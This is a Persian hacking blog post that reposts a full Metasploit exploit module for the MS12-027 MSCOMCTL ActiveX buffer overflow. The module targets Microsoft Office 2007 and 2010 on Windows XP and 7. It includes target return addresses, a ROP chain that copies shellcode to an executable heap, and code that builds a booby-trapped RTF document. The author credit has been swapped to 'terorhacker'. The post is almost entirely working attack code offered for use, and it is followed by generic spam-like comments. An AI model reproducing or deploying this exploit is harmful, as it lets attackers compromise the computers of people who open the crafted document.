تبلیغات
:.گام به گام تاهک با ترور هکر:. - MSCOMCTL ActiveX Buffer Overflow
 
چهارشنبه 13 اردیبهشت 1391 :: نویسنده : محمّد
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'MS12-027 MSCOMCTL ActiveX Buffer Overflow',
'Description' => %q{
    },
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery
  'terorhacker', # terorhacker module 
' terorhacker ' # terorhacker module
],
 'DefaultOptions' => 
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500,
'Space' => 900,
'BadChars' => "\x00",
'DisableNops' => true # no need
},
'Platform' => 'win',
'Targets' =>
[
# winword.exe v12.0.4518.1014 (No Service Pack)
# winword.exe v12.0.6211.1000 (SP1)
# winword.exe v12.0.6425.1000 (SP2)
# winword.exe v12.0.6612.1000 (SP3)
[ 'Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English',
{
'Offset' => 270,
'Ret' => 0x27583c30, # jmp esp # MSCOMCTL.ocx 6.1.95.45
'Rop' => false
}
],
# winword.exe v14.0.6024.1000 (SP1)
[ 'Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English',
{
'Ret' => 0x3F2CB9E1, # ret # msgr3en.dll
'Rop' => true,
'RopOffset' => 120
}
],
],
'DisclosureDate' => 'Apr 10 2012',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
], self.class)
end

def stream(bytes)
Rex::Text.to_hex(bytes).gsub("\\x", "")
end

def junk(n=1)
tmp = []
value = rand_text(4).unpack("L")[0].to_i
n.times { tmp << value }
return tmp
end

# Ikazuchi ROP chain (msgr3en.dll)
# Credits to Abysssec
 def create_rop_chain 
rop_gadgets = [
0x3F2CB9E0, # POP ECX # RETN
0x3F10115C, # HeapCreate() IAT = 3F10115C
# EAX == HeapCreate() Address
0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN
# Call HeapCreate() and Create a Executable Heap. After this call, EAX contain our Heap Address.
0x3F39AFCF, # CALL EAX # RETN
0x00040000,
0x00010000,
0x00000000,
0x3F2CB9E0, # POP ECX # RETN
0x00008000, # pop 0x00008000 into ECX
# add ECX to EAX and instead of calling HeapAlloc, now EAX point to the RWX Heap
0x3F39CB46, # ADD EAX,ECX # POP ESI # RETN
junk,
0x3F2CB9E0, # POP ECX # RETN
0x3F3B3DC0, # pop 0x3F3B3DC0 into ECX, it is a writable address.
# storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for further use ;)
0x3F2233CC, # MOV DWORD PTR DS:[ECX],EAX # RETN
0x3F2D59DF, #POP EAX # ADD DWORD PTR DS:[EAX],ESP # RETN
0x3F3B3DC4, # pop 0x3F3B3DC4 into EAX , it is writable address with zero!
# then we add ESP to the Zero which result in storing ESP into that address,
# we need ESP address for copying shellcode ( which stores in Stack ),
# and we have to get it dynamically at run-time, now with my tricky instruction, we have it!
0x3F2F18CC, # POP EAX # RETN
0x3F3B3DC4, # pop 0x3F3B3DC4 ( ESP address ) into EAX
# makes ECX point to nearly offset of Stack.
0x3F2B745E, # MOV ECX,DWORD PTR DS:[EAX] #RETN
0x3F39795E, # POP EDX # RETN
0x00000024, # pop 0x00000024 into EDX
# add 0x24 to ECX ( Stack address )
0x3F39CB44, # ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN
junk,
# EAX = ECX
0x3F398267, # MOV EAX,ECX # RETN
# mov EAX ( Stack Address + 24 = Current ESP value ) into the current Stack Location,
# and the popping it into ESI ! now ESI point where shellcode stores in stack
0x3F3A16DE, # MOV DWORD PTR DS:[ECX],EAX # XOR EAX,EAX # POP ESI # RETN
# EAX = ECX
0x3F398267, # MOV EAX,ECX # RETN
0x3F2CB9E0, # POP ECX # RETN
0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX
# makes EAX point to our RWX Heap
0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN
# makes EDI = Our RWX Heap Address
0x3F2B0A7C, # XCHG EAX,EDI # RETN 4
0x3F2CB9E0, # POP ECX # RETN
junk,
0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX
# makes EAX point to our RWX Heap
0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN
# just skip some junks
0x3F38BEFB, # ADD AL,58 # RETN
0x3F2CB9E0, # POP ECX # RETN
0x00000300, # pop 0x00000300 into ECX ( 0x300 * 4 = Copy lent )
# Copy shellcode from stack into RWX Heap
0x3F3441B4, # REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] # POP EDI # POP ESI # RETN
junk(2), # pop into edi # pop into esi
0x3F39AFCF # CALL EAX # RETN
].flatten.pack("V*")

# To avoid shellcode being corrupted in the stack before ret
rop_gadgets << "\x90" * target['RopOffset'] # make_nops doesn't have sense here
return rop_gadgets

end

def exploit

ret_address = stream([target.ret].pack("V"))

if target['Rop']
shellcode = stream(create_rop_chain)
else
# To avoid shellcode being corrupted in the stack before ret
shellcode = stream(make_nops(target['Offset']))
shellcode << stream(Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+6").encode_string)
shellcode << stream(make_nops(4))
end
shellcode << stream(payload.encoded)
while shellcode.length < 2378
shellcode += "0"
end

content = "{\\rtf1"
content << "{\\fonttbl{\\f0\\fnil\\fcharset0 Verdana;}}"
content << "\\viewkind4\\uc1\\pard\\sb100\\sa100\\lang9\\f0\\fs22\\par"
content << "\\pard\\sa200\\sl276\\slmult1\\lang9\\fs22\\par"
content << "{\\object\\objocx"
content << "{\\*\\objdata"
content << "\n"
content << "01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000"
content << "00000000000000000E0000"
content << "\n"
content << "D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000"
content << "00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF"
content << "FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400"
content << "72007900000000000000000000000000000000000000000000000000000000000000000000000000"
content << "000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628"
content << "0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00"
content << "49006E0066006F000000000000000000000000000000000000000000000000000000000000000000"
content << "0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000600000000000000"
content << "03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000"
content << "000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF"
content << "00000000000000000000000000000000000000000000000000000000000000000000000001000000"
content << "160000000000000043006F006E00740065006E007400730000000000000000000000000000000000"
content << "000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF"
content << "FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000"
content << "00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000"
content << "0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000"
content << "11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content << "FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000004C00690073007400"
content << "56006900650077004100000000000000000000000000000000000000000000000000000000000000"
content << "0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600"
content << "1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080"
content << "05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974"
content << "6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000"
content << "000000000000"
content << ret_address
content << "9090909090909090"
content << shellcode
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content << "00000000000000"
content << "\n"
content << "}"
content << "}"
content << "}"

print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)

end

end




نوع مطلب : اکسپلویت، 
برچسب ها :
لینک های مرتبط :


دوشنبه 30 مرداد 1396 01:25 ب.ظ
When I originally commented I clicked the "Notify me when new comments are added" checkbox and now each time a comment is added I get several emails with the same comment.
Is there any way you can remove people from that service?
Thanks!
شنبه 14 مرداد 1396 08:57 ق.ظ
My brother suggested I might like this website. He was entirely right.
This post actually made my day. You cann't imagine just how much time I had spent for this information! Thanks!
جمعه 13 مرداد 1396 09:53 ب.ظ
Your style is really unique in comparison to other folks I have read stuff from.
Thank you for posting when you have the opportunity, Guess
I will just bookmark this web site.
 
لبخندناراحتچشمک
نیشخندبغلسوال
قلبخجالتزبان
ماچتعجبعصبانی
عینکشیطانگریه
خندهقهقههخداحافظ
سبزقهرهورا
دستگلتفکر


:.گام به گام تاهک با ترور هکر:.
درباره وبلاگ


مدیر وبلاگ : محمّد
نویسندگان
نظرسنجی
نظرتون در باره وبلگ من چیه؟







آمار وبلاگ
کل بازدید :
بازدید امروز :
بازدید دیروز :
بازدید این ماه :
بازدید ماه قبل :
تعداد نویسندگان :
تعداد کل پست ها :
آخرین بازدید :
آخرین بروز رسانی :